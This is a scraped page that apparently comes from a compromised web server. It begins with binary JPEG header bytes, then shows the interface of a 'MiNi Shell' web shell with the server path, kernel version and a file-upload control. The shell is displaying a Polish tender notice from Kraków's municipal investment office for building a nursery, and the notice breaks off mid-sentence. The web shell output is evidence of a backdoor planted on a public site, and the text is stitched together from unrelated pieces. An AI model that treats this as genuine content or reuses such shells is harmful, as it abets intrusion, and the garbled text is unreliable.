JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240621/0037827501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Opracowanie dokumentacji projektowej oraz wykonanie robót budowlanych w technologii tradycyjnej dla budowy żłobka przy ul. Karaszewicza-Tokarzewskiego w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Inwestycji Miejskich w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367252869</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Reymonta 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-059</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zim.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zim.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej oraz wykonanie robót budowlanych w technologii tradycyjnej dla budowy żłobka przy ul. Karaszewicza-Tokarzewskiego w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93688826-2eee-11ef-b373-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00378275</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00050108/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Zaprojektowanie i budowa żłobka przy ul. Karaszewicza-Tokarzewskiego w Krakowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Krajowy Plan na rzecz Odbudowy i Zwiększania Odporności w ramach inwestycji A4.2.1. pn. Wsparcie programów dofinansowania miejsc opieki nad dziećmi 0-3 lat (żłobki, kluby dziecięce) w ramach MALUCH+ </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zimkrakow.ezamawiajacy.pl/pn/zimkrakow/demand/notice/publicpzp/current/list?USER_MENU_HOVER=publicpzpCurrentNoticePublicList <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zimkrakow.ezamawiajacy.pl zp@zim.krakow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy zakupowej Marketplanet dostępnej pod następującym adresem https://zimkrakow.ezamawiajacy.pl <br/>2. Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej, email: zp@zim.krakow.pl, z zastrzeżeniem sekcji XI pkt 2 SWZ, tj. składania ofert. <br/>UWAGA: Korespondencja kierowana do Zamawiającego powinna być opatrzona numerem postępowania, tj. ZIM.ZP.262.2.14.2024. <br/>3. Szczegółowe informacje w zakresie wymagań technicznych i organizacyjnych dotyczących korespondencji elektronicznej zostały opisane w sekcji VIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące RODO zostały opisane w sekcji XXIV SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące RODO zostały opisane w sekcji XXIV SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZIM.ZP.262.2.14.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej oraz wykonanie robót budowlanych w technologii tradycyjnej dla budowy żłobka samorządowego przy ul. Karaszewicza-Tokarzewskiego w Krakowie. Przedmiotowe zadanie realizowane jest w formule zaprojektuj i wybuduj. <br/><br/>2. Szczegółowy opis przedmiotu zamówienia oraz zakres obowiązków Wykonawcy został określony w załącznikach do SWZ, w tym m.in. w Projektowanych postanowieniach umownych (zwanych dalej PPU), stanowiących załącznik nr 1 do SWZ oraz Programie Funkcjonalno-Użytkowym (zwanym dalej PFU), stanowiącym załącznik nr 1 do PPU oraz załącznikach do PFU. Wykaz dokumentów opisujących przedmiot zamówienia tj. Program Funkcjonalno – Użytkowy wraz z załącznikami (link do dokumentów opisujących przedmiot zamówienia) - stanowi załącznik nr 10 do SWZ.<br/>UWAGA: W każdym miejscu PFU, w którym wskazuje się lub przytacza Polską Normę PN, Zamawiający dopuszcza normy równoważne, zgodnie z art. 101 ust. 4 ustawy.<br/><br/>3. Przedmiot zamówienia zostanie wykonany w dwóch Etapach:<br/>1) Etap I – obejmujący wykonanie pełnobranżowej dokumentacji projektowo-kosztorysowej, składającej się z:<br/>a)	projektu budowlanego, w tym projektu zagospodarowania terenu, projektu architektoniczno-budowlanego,<br/>b)	projektów technicznych wszystkich niezbędnych branż,<br/>c)	projektów wykonawczych wszystkich niezbędnych branż,<br/>d)	wszelkich wymaganych prawem pozwoleń, uzgodnień i opinii niezbędnych do realizacji Przedmiotu umowy, w tym ostatecznej decyzji o pozwoleniu na budowę żłobka,<br/>e)	przedmiarów robót,<br/>f)	kosztorysów inwestorskich,<br/>g)	specyfikacji technicznych wykonania i odbioru robót budowlanych.<br/><br/>2) Etap II – obejmujący wykonanie robót budowlanych, a w szczególności:<br/>a)	przygotowanie placu budowy;<br/>b)	wykonanie wycinki drzew i krzewów zgodnie z uzyskanymi decyzjami administracyjnymi;<br/>c)	wykonanie robót budowlanych objętych dokumentacją projektową wraz z wyposażeniem podstawowym i zagospodarowaniem terenu;<br/>d)	utylizację odpadów budowlanych zgodnie z ustawą o odpadach;<br/>e)	przeprowadzenie badań i kontroli wykonanych robót budowlanych;<br/>f)	wykonanie nasadzeń zastępczych drzew i krzewów zgodnie z uzyskanymi decyzjami administracyjnymi.<br/>g)	przeprowadzenie procedury odbioru robót budowlanych;<br/>h)	uzyskanie decyzji zezwalającej na użytkowanie obiektu budowlanego;<br/>i)	opracowanie dokumentacji powykonawczej<br/>j)	uporządkowanie placu budowy i przekazanie obiektu Zamawiającemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45215000-7 - Roboty budowlane w zakresie budowy obiektów budowlanych opieki zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności publicznej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 305 pkt 1) w zw. z art. 214 ust. 1 pkt 7) ustawy Pzp, zgodnych z jego przedmiotem stanowiących powtórzenie podobnego przedmiotu zamówienia do kwoty 1 103 417,34 zł netto. Zamawiający przewiduje w okresie 3 lat od dnia udzielenia zamówienia podstawowego ewentualne udzielenie zamówienia polegającego na powtórzeniu podobnych robót polegających na zaprojektowaniu i wykonaniu robót budowlanych w technologii tradycyjnej budynku żłobka samorządowego przy ul. Karaszewicza-Tokarzewskiego w Krakowie. Ustalenie wynagrodzenia Wykonawcy nastąpi po wcześniejszych negocjacjach z Wykonawcą (ceny robót budowlanych nie mogą przekroczyć średnich cen SEKOCENBUD na dany kwartał).</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium:<br/>1. Cena – waga 60% (60 pkt),<br/>2. Wydłużenie podstawowego okresu gwarancji jakości oraz rękojmi za wady na roboty budowlane - waga 40% (40 pkt).<br/>Szczegółowe informacje dotyczące kryteriów oceny ofert zostały określone w sekcji XVIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie podstawowego okresu gwarancji jakości oraz rękojmi za wady na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej.<br/><br/>2.	Zamawiający uzna warunki w zakresie zdolności technicznej lub zawodowej za spełnione, jeżeli Wykonawca wykaże, że:<br/>2.1.	w okresie ostatnich 5 lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy w tym okresie, licząc wstecz od dnia upływu terminu składania ofert, wykonał co najmniej jedną robotę budowlaną polegającą na budowie jednego budynku w technologii tradycyjnej oraz:<br/>a)	budynek ten posiadał instalację wentylacji mechanicznej nawiewno-wywiewnej i klimatyzacji, <br/>b)	powierzchnia użytkowa tego budynku była nie mniejsza niż 350 m2,<br/>c)	budynek ten uzyskał decyzję o pozwoleniu na użytkowanie;<br/><br/>2.2.	dysponuje osobami zdolnymi do wykonania przedmiotowego zamówienia w szczególności co najmniej jedną osobą, która będzie pełnić w trakcie realizacji przedmiotu zamówienia funkcję Głównego Projektanta: <br/>a)	posiadającą uprawnienia budowlane w specjalności architektonicznej do projektowania bez ograniczeń, wydanymi na podstawie przepisów ustawy z dnia 7 lipca 1994 Prawo budowlane, zwanej dalej „ustawą PB”,<br/>b)	legitymującą się wpisem na listę członków Okręgowej Izby Samorządu Zawodowego,<br/>c)	posiadającą doświadczenie w sporządzeniu co najmniej jednego projektu budowlanego dla budowy:<br/>•	żłobka lub <br/>•	przedszkola lub <br/>•	zespołu żłobkowo–przedszkolnego lub <br/>•	zespołu szkolno-przedszkolnego lub <br/>•	zespołu szkolno–przedszkolno-żłobkowego, <br/>na podstawie którego została uzyskana decyzja o pozwoleniu na budowę;<br/>d)	posiadającą doświadczenie w sprawowaniu nadzoru autorskiego w rozumieniu art. 20 ust. 1 pkt 4) ustawy PB nad co najmniej jednym projektem budowlanym dla budowy: <br/>•	żłobka lub <br/>•	przedszkola lub <br/>•	zespołu żłobkowo–przedszkolnego lub <br/>•	zespołu szkolno-przedszkolnego lub <br/>•	zespołu szkolno–przedszkolno-żłobkowego.<br/><br/>Uwagi do warunków udziału w postępowaniu o udzielnie zamówienia publicznego:<br/>1)	Dotyczy pkt 2.1.: Przez „budynek” należy rozumieć taki obiekt budowlany, który jest trwale związany z gruntem, wydzielony z przestrzeni za pomocą przegród budowlanych oraz posiada fundamenty i dach /art. 3 pkt 2) ustawy PB/. <br/>2)	Dotyczy pkt 2.1.: Pod pojęciem „wykonał co najmniej jedną robotę budowlaną” należy rozumieć odebrane roboty budowlane zakończone uzyskaniem ostatecznej decyzji w sprawie pozwolenia na użytkowanie budynku lub równoważnego dokumentu. <br/>3)	Dotyczy pkt 2.1.: Przez „w okresie ostatnich 5 lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy w tym okresie, licząc wstecz od dnia upływu terminu składania ofert” – Zamawiający rozumie, że w okresie ostatnich 5 lat przypadł dzień, w którym uzyskano decyzję w sprawie pozwolenia na użytkowanie budynku lub równoważny dokument a w przypadku inwestycji zlokalizowanych na obszarze poza terytorium Rzeczpospolitej Polskiej inny / inne równoważne dokumenty stwierdzające zgodnie z obowiązującymi, właściwymi przepisami prawa dopuszczenie do użytkowania budynku stanowiącego przedmiot robót budowlanych.<br/>4)	Dotyczy pkt 2.1. lit. b): Przez „powierzchnia użytkowa” Zamawiający rozumie powierzchnię użytkową mierzoną zgodnie z § 20 ust. 1. pkt 4b Rozporządzenia Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (t.j. Dz.U. 2022 poz. 1679) lub inne równoważne przepisy. W przypadku inwestycji zlokalizowanych na obszarze poza terytorium Rzeczpospolitej Polskiej inne równoważne definicje / wytyczne zgodnie z obowiązującymi, właściwymi przepisami prawa.<br/>5)	Dotyczy pkt 2.2.: Zamawiający dopuszcza równoważne uprawnienia, w szczególności wydane na podstawie wcześniej obowiązujących przepisów lub wydane obywatelom innych państw w oparciu o stosowne ustawodawstwo, a uznanymi bądź dopuszczonymi do wykonywania w Rzeczpospolitej Polskiej. W przypadku inwestycji zlokalizowanych na obszarze poza terytorium Rzeczpospolitej Polskiej inne równoważne definicje zgodnie z obowiązującymi, właściwymi przepisami prawa.<br/>6)	Dotyczy pkt 2.2. lit. c): Pod pojęciem „sporządzeniu co najmniej jednego projektu budowlanego” należy rozumieć projekt budowlany, który uzyskał ostateczną decyzję o pozwoleniu na budowę lub równoważną decyzję. <br/>7)	Dotyczy pkt 2.1. i 2.2.: Zamawiający dopuszcza równoważne decyzje do opisanych w pkt 2.1. (decyzja o pozwoleniu na użytkowanie) oraz pkt 2.2. (decyzja o pozwoleniu na budowę), w szczególności wydane na podstawie wcześniej obowiązujących przepisów lub wydanych w oparciu o stosowne ustawodawstwo w przypadku inwestycji zlokalizowanych na obszarze poza terytorium Rzeczpospolitej Polskiej.<br/>8)	Dotyczy pkt 2.1. i 2.2.: Przez pojęcie „budowie” / „budowę” Zamawiający rozumie wykonywanie obiektu budowlanego w określonym miejscu. W przypadku inwestycji zlokalizowanych na obszarze poza terytorium Rzeczpospolitej Polskiej inne równoważne definicje zgodnie z obowiązującymi, właściwymi przepisami prawa.<br/><br/>3. Pozostałe informacje dotyczące warunków udziału w postępowaniu zostały określone w sekcji XIV SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu, na dzień składania ofert, podpisane odpowiednio przez osoby upoważnione do reprezentowania Wykonawcy, według wzoru stanowiącego załącznik nr 3 do SWZ; <br/><br/>2. Jeżeli dotyczy, w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (np. członkowie konsorcjum, wspólnicy spółki cywilnej) Oświadczenie o niepodleganiu wykluczeniu oraz Oświadczenie o spełnianiu warunków udziału w postępowaniu, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te winny potwierdzać brak podstaw do wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu (art. 125 ust. 4 ustawy Pzp), według wzoru stanowiącego załącznik nr 3 do SWZ; <br/><br/>3. Jeżeli dotyczy, w przypadku polegania przez Wykonawcę na zdolnościach lub sytuacji podmiotów udostępniających zasoby na podstawie w art. 118 ust. 1 ustawy Pzp: Oświadczenie o niepodleganiu wykluczeniu oraz Oświadczenie o spełnianiu warunków udziału w postępowaniu, w zakresie jakim Wykonawca powołuje się na jego zasoby (art. 125 ust. 5 ustawy Pzp), według wzoru stanowiącego załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych, w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>Wykaz robót budowlanych zaleca się sporządzić według wzoru stanowiącego załącznik nr 7 do SWZ. <br/>UWAGA: Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi Wykonawcami, wówczas w powyższym Wykazie zobowiązany jest podać jedynie te roboty, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył. <br/><br/>2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/>Wykaz osób zaleca się sporządzić według wzoru stanowiącego załącznik nr 8 do SWZ. <br/><br/>3. Wyżej wymienione wykazy Wykonawca składa w odpowiedzi na wezwanie Zamawiającego.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1.1. Formularz oferty – poprzez zamieszczenie na Platformie wypełnionego i podpisanego załącznika nr 2 do SWZ, sporządzonego wg wzoru udostępnionego przez Zamawiającego. W przypadku złożenia oferty na innym formularzu niż załącznik nr 